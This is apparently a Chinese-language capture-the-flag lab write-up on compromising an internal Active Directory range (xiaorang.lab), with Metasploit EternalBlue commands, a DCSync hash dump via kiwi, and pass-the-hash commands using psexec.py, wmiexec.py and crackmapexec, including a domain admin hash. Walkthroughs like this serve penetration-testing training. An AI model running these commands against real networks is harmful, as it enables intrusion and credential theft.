这个靶机比较特殊 他是由三部分的flag组成一个完整的flag

image-20231006183707297

漏洞都给扫出来了 直接去打就行了

image-20231006184027853

直接去写马 然后反弹shell

image-20231006184318407

image-20231006184327154

然后sudo -l 发现了这个mysql可以利用来提权

image-20231006184416198

image-20231006184457584

image-20231006184514890

上传个fscan扫一下内网

image-20231006185041206

整理一下信息

172.22.1.2 DC域控主机

172.22.1.15 外网主机 getshell

172.22.1.18 3306 OA系统

172.22.1.21 域内主机 MS17 永恒之蓝

先给这个linux主机上msf先

image-20231006185355983

成功上线

然后去使用stowaway挂个代理

image-20231006190449700

既然说这个21这个台主机存在MS17

这里的话我是用kali下的msf打的 服务器上的话不知道为啥老是失败

1
2
3
4
5
proxychains4 msfconsole
use exploit/windows/smb/ms17_010_eternalblue
set payload windows/x64/meterpreter/bind_tcp_uuid  //这个是个关键了 可以配合proxychains4本地使用
set RHOSTS 172.22.1.21
exploit

如果要是再服务器上用的话要加上route add xxxx

image-20231006190643419

成功上线这台域内主机 还是system权限

然后上传个sharphound.exe进去分析一下域内环境

image-20231006190804985

发现这个机器对域控有DCSync权限 于是我们导出域内所有人的hash值

1
2
load kiwi
kiwi_cmd "lsadump::dcsync /domain:xiaorang.lab /all /csv" exit

image-20231006191007593

拿到了域管的hash值 那么直接pth攻击

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
hash传递攻击的几种方法  (其原理都是使用smb服务来进行攻击)

psexec.py

proxychains4 python psexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2

-hashes: 域管hash值 dscyn获取
xiaorang.lab  域名
administrator 域管账户
172.22.1.2 域控账户

wmiexec.py

proxychains4 python wmiexec.py -hashes :10cf89a850fb1cdbe6bb432b859164c8 xiaorang.lab/administrator@172.22.1.2


crackmapexec  (这种是不能进入shell命令行的 )

proxychains4 crackmapexec smb 172.22.1.2 -u administrator -H10cf89a850fb1cdbe6bb432b859164c8 -d xiaorang.lab -x "type Users\Administrator\flag\flag03.txt"


impacket-wmiexec 

proxychains4 impacket-wmiexec xiaorang.lab/administrator@172.22.1.18 -hashes :10cf89a850fb1cdbe6bb432b859164c8

这就是使用pth攻击的几种方法 这里就打完了 拿着域管的hash去登录另一台机器就行了 (OA)

(上面工具原理就是基于这个SMB服务 445端口)